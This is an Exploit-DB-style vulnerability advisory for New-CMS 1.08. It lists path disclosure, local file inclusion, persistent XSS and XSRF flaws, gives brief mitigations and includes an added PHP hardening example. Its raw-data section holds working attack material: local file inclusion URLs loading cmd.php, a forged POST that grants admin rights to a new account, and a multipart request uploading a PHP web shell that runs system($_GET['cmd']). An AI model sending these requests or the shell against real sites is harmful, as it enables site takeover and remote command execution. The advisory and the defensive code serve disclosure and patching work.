Vendor: New-CMS
By: Alberto Fontanella
CVSS: 8.8 (HIGH)
Vulnerability types: Full Path Disclosure, Local File Inclusion, Persistent XSS, XSRF
CWE: 20, 22, 79, 352
Product Name: New-CMS
Affected Version From: 1.08
Affected Version To: 1.08
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu Server 9.10
2010

Multiple Vulnerabilities in New-CMS

Full Path Disclosure: A vulnerability in New-CMS allows an attacker to view the full path of the web application.
Local File Inclusion: A vulnerability in New-CMS allows an attacker to include a local file in the web application.
Persistent XSS: A vulnerability in New-CMS allows an attacker to inject malicious JavaScript code into the web application.
XSRF: A vulnerability in New-CMS allows an attacker to perform certain actions on behalf of the user without their knowledge or consent.

Mitigation:

To mitigate Full Path Disclosure, ensure that the web application does not reveal the full path of the application.
To mitigate Local File Inclusion, ensure that the web application does not allow the inclusion of local files.
To mitigate Persistent XSS, ensure that the web application does not allow the injection of malicious JavaScript code.
To mitigate XSRF, ensure that the web application does not allow unauthorized actions to be performed on behalf of the user.
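As an added example (not New-CMS code and not from the advisory), the following PHP shows the two server-side checks that close the Local File Inclusion and XSRF items: an allow-list on the `lng` parameter before any include of a `/lingue/*.str` file, and a session-bound anti-CSRF token for the admin forms. The function names, the `csrf_token` field and the temporary language file are assumptions.

```php
<?php
declare(strict_types=1);
// Hypothetical hardened loader for the language file selected by ?lng=...
// Returns the canonical path of <langDir>/<lng>.str, or null to refuse the request.
function resolveLanguageFile(string $langDir, string $lng): ?string
{
    // Allow-list: only short codes such as "it" or "en-us". This rejects
    // "cmd.php", "..", path separators and NUL bytes before touching the filesystem.
    if (preg_match('/^[a-z]{2}(-[a-z]{2})?$/', $lng) !== 1) {
        return null;
    }
    $base = realpath($langDir);
    $real = realpath($langDir . '/' . $lng . '.str');
    // Defence in depth: the canonical path must still lie inside the language directory.
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Hypothetical anti-XSRF check: the admin form must carry a token bound to the session.
function csrfTokenIsValid(array $post, array $session): bool
{
    return isset($post['csrf_token'], $session['csrf_token'])
        && is_string($post['csrf_token']) && is_string($session['csrf_token'])
        && hash_equals($session['csrf_token'], $post['csrf_token']);
}

function check(bool $ok, string $what): void
{
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

// Self-check against a constructed temporary language directory.
$dir = sys_get_temp_dir() . '/lingue_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/it.str', "titolo=Benvenuto\n");
check(resolveLanguageFile($dir, 'it') === realpath($dir . '/it.str'), 'valid code accepted');
check(resolveLanguageFile($dir, 'cmd.php') === null, 'script name refused');
check(resolveLanguageFile($dir, '../../etc/passwd') === null, 'traversal refused');
$token = bin2hex(random_bytes(16));
check(csrfTokenIsValid(['csrf_token' => $token], ['csrf_token' => $token]), 'matching token');
check(!csrfTokenIsValid(['csrf_token' => 'x'], ['csrf_token' => $token]), 'wrong token refused');
check(!csrfTokenIsValid([], ['csrf_token' => $token]), 'missing token refused');
unlink($dir . '/it.str');
rmdir($dir);
echo "all checks passed\n";
```

The loader is the replacement for whatever `include` the `lng` parameter currently feeds; the token check must run before any state-changing admin action such as the `azione=new` request quoted below.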

Exploit-DB raw data:

#
#
# Multiple Vulnerability in New-CMS
#
# [Vendor SW]: New-CMS
# [Version]: 1.08 (but possible all versions)
# [Vendor URL]: www.new-cms.org
# [Tested on]: Ubuntu Server 9.10
# [Category]: Webapps/0day
#
# [Date]: 17 Feb 2010
# [Author]: Alberto "fulgur" Fontanella
# [Author URL]: ictsec.wordpress.com
# [Author EMAIL]: itsicurezza<0x40>yahoo.it
#
#


[ 1 ] - [ Full Path Disclosure ]

http://[host]/struttura/ricerca.php
http://[host]/pdf.php
http://[host]/index.php?lng=it&pg=manager
...etc

Fatal error: Call to undefined function ListaFile() in
/var/www/struttura/ricerca.php on line 8


[ 2 ] - [ Local File Inclusion ]

http://[host]/index.php?pg=cmd

You have to put cmd.php in /struttura/

http://[host]/pdf.php?lng=cmd.php
http://[host]/newcms/struttura/manager.php?lng=cmd.php
http://[host]/newcms/struttura/editor/quote.php?lng=cmd.php
...etc

You have to put cmd.php.str in /lingue/


[ 3 ] - [ Persistent XSS ]

Write an Article/News and Put in the Title field:

">



[ 4 ] - [ XSRF ]

To give privileges to an User Account:

POST /index.php?lng=it&pg=admin&s=redattori HTTP/1.1
Host: [host]
Keep-Alive: 300
Connection: keep-alive
Referer: http://[host]/index.php?lng=it&pg=admin&s=redattori
Content-Type: application/x-www-form-urlencoded
Content-Length: 64

azione=new&add_red=Haxor&opt1=on&opt2=on&opt3=on&opt4=on&opt5=on

To upload a PHP Shell:

POST /struttura/manager.php?lng=it&upload=ok&id=indirizzo_0 HTTP/1.1
Host: [host]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[host]/struttura/manager.php?lng=it&id=indirizzo_0
Content-Type: multipart/form-data;
boundary=---------------------------213917452311081853951240913053
Content-Length: 424

-----------------------------213917452311081853951240913053
Content-Disposition: form-data; name="radice"
Content-Disposition: form-data; name="per"


-----------------------------213917452311081853951240913053
Content-Disposition: form-data; name="file"; filename="cmd9.php"
Content-Type: application/x-httpd-php

<?php
system($_GET['cmd']);
?>

-----------------------------213917452311081853951240913053--